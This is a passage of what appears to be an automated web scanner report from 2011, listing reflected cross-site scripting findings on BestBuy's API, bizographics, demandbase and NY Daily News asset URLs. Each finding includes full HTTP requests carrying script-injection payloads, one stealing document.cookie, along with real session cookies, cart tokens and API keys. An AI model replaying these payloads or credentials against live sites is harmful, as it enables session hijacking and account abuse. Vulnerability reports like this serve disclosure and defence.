Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "9f3a6c2d1a0f6542ce664baf7784469a"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2456
Date: Thu, 11 Aug 2011 23:50:14 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
12292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99d5e64<script>alert(1)</script>484527ebd4e&format=json'",
"status": "400 Bad Request"
}
})

4.15. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [show parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bbyremix.bestbuy.com
Path:	/v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 6c6ee<script>alert(1)</script>9c6093a9606 was submitted in the show parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku6c6ee<script>alert(1)</script>9c6093a9606&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web3.ATL
Etag: "9d76a63d9b3373d9fde5abdd13e2c8c9"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2456
Date: Thu, 11 Aug 2011 23:50:09 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
],
"code": 400,
"message": "Couldn't understand '/v1/products(sku in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku6c6ee<script>alert(1)</script>9c6093a9606&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json'",
"status": "400 Bad Request"
}
})

4.16. http://api.bizographics.com/v1/profile.redirect [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload f3a73<script>alert(1)</script>d98aef6a709 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wdsf3a73<script>alert(1)</script>d98aef6a709&admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXSH5Dnsisghkaj5XcunNcMDa7Re6IGD4lBDMrHLjNQH9Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQisoAFDZgxHJAX1nSmuONzqEVUJBxdqAyCgQ2DU8QwOXXYR472xAuokuJrWsMNDohYipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 11 Aug 2011 22:35:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (8dn4jnyemg4ky9svqgs28wdsf3a73<script>alert(1)</script>d98aef6a709)

4.17. http://api.bizographics.com/v1/profile.redirect [callback_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 30842<script>alert(1)</script>de1b16eacb5 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&callback_url=30842<script>alert(1)</script>de1b16eacb5 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXSH5Dnsisghkaj5XcunNcMDa7Re6IGD4lBDMrHLjNQH9Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQisoAFDZgxHJAX1nSmuONzqEVUJBxdqAyCgQ2DU8QwOXXYR472xAuokuJrWsMNDohYipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 11 Aug 2011 22:36:13 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: 30842<script>alert(1)</script>de1b16eacb5

4.18. http://api.demandbase.com/api/v2/ip.js [var parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.demandbase.com
Path:	/api/v2/ip.js

Issue detail

The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31774%3balert(1)//23ded926607 was submitted in the var parameter. This input was echoed as 31774;alert(1)//23ded926607 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /api/v2/ip.js?key=e4086fa3ea9d74ac2aae2719a0e5285dc7075d7b&var=s_dmdbase_v_131774%3balert(1)//23ded926607&rnd=3023 HTTP/1.1
Host: api.demandbase.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.adobe.com/cfusion/search/index.cfm?term=xss&siteSection=solutions.html&loc=en_us&9ea5a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3b867a7c636=1
Cookie: _jsuid=1110217733238110538; __utma=67952772.705302637.1314726715.1314726715.1314726715.1; __utmz=67952772.1314726715.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Wed, 31 Aug 2011 13:11:55 GMT
Server: nginx/1.0.4
Status: 200 OK
Vary: Accept-Encoding
Content-Length: 367
Connection: keep-alive

var s_dmdbase_v_131774;alert(1)//23ded926607={"registry_longitude":-96.8207015991211,"registry_country_code":"US","registry_state":"TX","registry_city":"Dallas","registry_latitude":32.7825012207031,"isp":true,"registry_zip_code":"75207","registr
...[SNIP]...

4.19. http://assets.nydailynews.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8425'%3balert(1)//f2815976b98 was submitted in the REST URL parameter 1. This input was echoed as a8425';alert(1)//f2815976b98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.icoa8425'%3balert(1)//f2815976b98 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/errorpage/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.8.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|o|o|o|M|8M8M8YsoH0|o

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:51:01 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69729
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/favicon.icoa8425';alert(1)//f2815976b98';
}
//-->
...[SNIP]...

4.20. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa7d9'%3balert(1)//101192a7b4c was submitted in the REST URL parameter 1. This input was echoed as aa7d9';alert(1)//101192a7b4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imgaa7d9'%3balert(1)//101192a7b4c/2011/08/12/alg_charla-nash_surgery.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:17 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/imgaa7d9';alert(1)//101192a7b4c/2011/08/12/alg_charla-nash_surgery.jpg';
}
//-->
...[SNIP]...

4.21. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d79f4'%3balert(1)//1ef7a89ad08 was submitted in the REST URL parameter 2. This input was echoed as d79f4';alert(1)//1ef7a89ad08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/2011d79f4'%3balert(1)//1ef7a89ad08/08/12/alg_charla-nash_surgery.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:35 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011d79f4';alert(1)//1ef7a89ad08/08/12/alg_charla-nash_surgery.jpg';
}
//-->
...[SNIP]...

4.22. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a069'%3balert(1)//a554b3287db was submitted in the REST URL parameter 3. This input was echoed as 8a069';alert(1)//a554b3287db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/2011/088a069'%3balert(1)//a554b3287db/12/alg_charla-nash_surgery.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:49 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/088a069';alert(1)//a554b3287db/12/alg_charla-nash_surgery.jpg';
}
//-->
...[SNIP]...

4.23. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7529b'%3balert(1)//3afc937eb48 was submitted in the REST URL parameter 4. This input was echoed as 7529b';alert(1)//3afc937eb48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/2011/08/127529b'%3balert(1)//3afc937eb48/alg_charla-nash_surgery.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
